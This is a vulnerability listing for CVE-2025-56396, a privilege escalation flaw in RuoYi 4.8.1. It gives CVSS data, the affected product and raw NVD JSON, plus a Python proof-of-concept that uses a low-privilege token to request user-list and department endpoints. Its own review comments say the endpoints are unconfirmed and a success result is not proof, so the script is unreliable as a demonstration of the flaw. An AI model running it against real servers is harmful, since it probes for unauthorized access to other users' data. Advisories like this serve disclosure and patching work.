Security Vulnerability Report
CVE-2025-56396 CVSS 8.8 HIGH

CVE-2025-56396

Published: 2025-11-26 16:15:48
Last Modified: 2025-12-04 20:16:19

Description

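An issue was discovered in RuoYi 4.8.1 that allows attackers to gain escalated privileges because the user's owning department has higher rights than the active user. Per the CVSS vector below, the issue is reachable over the network and requires only a low-privileged account (PR:L) with no user interaction.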

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ruoyi:ruoyi:4.8.1:*:*:*:*:*:*:* - VULNERABLE
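RuoYi <= 4.8.1 (note: the CPE match above names only version 4.8.1; the CVE record on this page does not state whether earlier releases are affected)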

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
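# CVE-2025-56396 PoC - RuoYi 4.8.1 Privilege Escalation
# Author: Security Researcher
# Target: RuoYi <= 4.8.1
#
# NOTE(review): the endpoints, the bearer-token header and the response
# envelope used below are taken as given from this listing; nothing on the
# page confirms that they match a real RuoYi 4.8.1 deployment. Confirm them
# against the vendor issue before trusting a positive or a negative result.
import requests
import json

# Placeholders: replace with the base URL of a test instance and the token of
# the low-privileged test account.
# NOTE(review): the placeholder scheme is http://, which sends the bearer
# token in clear text; prefer https:// when the test instance supports it.
TARGET_URL = "http://target-ruoyi-server.com"
ATTACKER_TOKEN = "attacker_bearer_token_here"

# Without a timeout, requests waits indefinitely on an unresponsive host.
_REQUEST_TIMEOUT_SECONDS = 10


def _get(url, headers):
    """Send one GET request and return the response, or None on a transport error."""
    try:
        return requests.get(url, headers=headers, timeout=_REQUEST_TIMEOUT_SECONDS)
    except requests.RequestException as exc:
        print(f"[-] Request to {url} failed: {exc}")
        return None


def _json_object(response):
    """Return the response body as a dict, or None if it is not a JSON object."""
    try:
        body = response.json()
    except ValueError:
        # An HTML login page or error page answered with status 200.
        return None
    return body if isinstance(body, dict) else None


def privilege_escalation_poc():
    """
    PoC for CVE-2025-56396: RuoYi 4.8.1 Privilege Escalation

    The vulnerability allows attackers to gain escalated privileges due to
    the owning department having higher rights than the active user.

    Requests the user-list endpoint with the configured token and returns
    True when the server answers HTTP 200 with a JSON body whose "code"
    field equals 200; returns False in every other case, including
    transport errors and non-JSON bodies.

    NOTE(review): a True result indicates an access-control failure only if
    the token's account is known not to hold the user-list permission. The
    script does not establish that baseline itself.
    """
    # Step 1: Attempt to access admin panel with low-privilege user
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Step 2: Try to list all users (requires admin privileges)
    admin_endpoint = f"{TARGET_URL}/system/user/list"
    response = _get(admin_endpoint, headers)

    if response is not None and response.status_code == 200:
        data = _json_object(response)
        if data is not None and data.get("code") == 200:
            print("[+] Privilege Escalation Successful!")
            # Report only the top-level field names: the records themselves
            # are other users' account data and do not belong in console
            # output or test logs.
            print("[+] User list returned; top-level response fields:")
            print(json.dumps(sorted(data), indent=2))
            return True

    print("[-] Privilege Escalation Failed")
    return False


def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-56396

    Reads the profile of the token's account, extracts data.dept.deptId and
    requests that department record. Returns True when the department
    request answers HTTP 200, otherwise False.

    NOTE(review): a 200 on the department record only shows that the record
    is readable with this token. Taken alone it does not demonstrate the
    rights mismatch described in the advisory, so treat True as
    "worth investigating", not as confirmation.
    """
    # Check system info endpoint
    info_url = f"{TARGET_URL}/system/user/profile"
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}

    response = _get(info_url, headers)
    if response is None or response.status_code != 200:
        return False

    # Walk data -> dept -> deptId, tolerating missing or null levels.
    node = _json_object(response)
    for key in ("data", "dept", "deptId"):
        node = node.get(key) if isinstance(node, dict) else None
    dept_id = node
    print(f"[*] User belongs to department: {dept_id}")

    if dept_id is None:
        # Avoid requesting ".../system/dept/None" and misreading its answer.
        print("[-] No department id found in profile response")
        return False

    # Check if department has higher privileges
    dept_info_url = f"{TARGET_URL}/system/dept/{dept_id}"
    dept_response = _get(dept_info_url, headers)

    if dept_response is not None and dept_response.status_code == 200:
        print("[!] Potential vulnerability: Department info accessible")
        return True

    return False


if __name__ == "__main__":
    print("CVE-2025-56396 RuoYi 4.8.1 Privilege Escalation PoC")
    print("=" * 50)
    check_vulnerability()
    print("\n[*] Attempting privilege escalation...")
    privilege_escalation_poc()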

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56396", "sourceIdentifier": "[email protected]", "published": "2025-11-26T16:15:48.183", "lastModified": "2025-12-04T20:16:19.103", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Ruoyi 4.8.1 allowing attackers to gain escalated privileges due to the owning department having higher rights than the active user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruoyi:ruoyi:4.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "66B50E9E-F41D-4BDA-9079-3A1AC60C83F8"}]}]}], "references": [{"url": "https://gist.github.com/Han-tj/22cfd18fa9f116bb886e8e56782f6865", "source": "[email protected]", "tags": ["Third Party 
Advisory"]}, {"url": "https://gitee.com/y_project/RuoYi/issues/ICJ865", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}